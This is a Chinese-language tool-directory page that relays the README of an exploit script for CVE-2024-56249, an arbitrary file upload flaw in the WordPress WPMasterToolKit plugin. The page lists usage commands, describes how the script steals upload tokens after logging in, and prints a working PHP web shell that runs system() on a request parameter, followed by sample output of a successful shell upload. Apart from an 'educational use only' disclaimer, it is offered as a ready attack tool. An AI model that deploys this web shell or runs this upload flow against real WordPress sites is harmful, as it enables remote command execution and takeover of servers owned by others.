Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit 插件 <= 1.13.1 - 任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-56249
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit 插件 <= 1.13.1 - 任意文件上传漏洞

查看仓库
1111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛠️ WordPress Master Toolkit 漏洞利用脚本 (CVE-2024-56249)

🌟 概述

该脚本利用 WordPress WPMasterToolKit 插件中的任意文件上传漏洞,允许攻击者将网页后门上传到服务器。该漏洞存在于插件版本 <= 1.13.1 中。

📝 CVE 详情

  • CVE ID: CVE-2024-56249
  • 公布日期: 2025-01-02
  • 更新日期: 2025-01-02
  • 描述: Webdeclic 的 WPMasterToolKit 存在不受限制的具有危险类型的文件上传漏洞,允许向 Web 服务器上传 Web Shell。
  • CWE: CWE-434: 不受限制的具有危险类型的文件上传
  • CVSS 评分: 9.1(严重)
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 使用方法

要利用此漏洞,请使用以下命令:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 参数

  • -u / --url: 目标 WordPress URL(例如 http://192.168.100.74:888/wordpress)
  • -un / --username: WordPress 管理员用户名
  • -p / --password: WordPress 管理员密码
  • -fp / --filepath: 文件上传路径(默认: wp-content/uploads/2025/03)
  • -fn / --filename: 要上传的文件名(默认: shell.php)

🧩 脚本说明

🔍 1. 探测漏洞

脚本首先探测目标 URL,通过检查 WPMasterToolKit 插件的版本来验证其是否存在 CVE-2024-56249 漏洞。

🔑 2. 认证到 WordPress

然后尝试使用提供的凭据登录到 WordPress 管理面板。

🛡️ 3. 提取安全令牌

成功登录后,脚本提取文件上传所需的安全令牌(nonce 和 token)。

📤 4. 部署载荷

利用提取的令牌,将指定的文件(例如 Web Shell)上传到目标服务器。

✅ 5. 验证上传

最后,脚本通过检查文件是否可通过目标 URL 访问来验证上传是否成功。

📂 注意

请确保 shell 文件(例如 shell.php)与脚本位于同一目录中,然后再运行脚本。这是脚本成功定位并上传文件的必要条件。

示例 Shell 文件 (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 示例

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ 输出

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ 脚本使用帮助

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ 免责声明

此工具仅用于教育目的。使用风险自负。作者对因使用此工具造成的任何误用或损害概不负责。


漏洞利用脚本由 Nxploit | Khaled Alenazi 编写

下载工具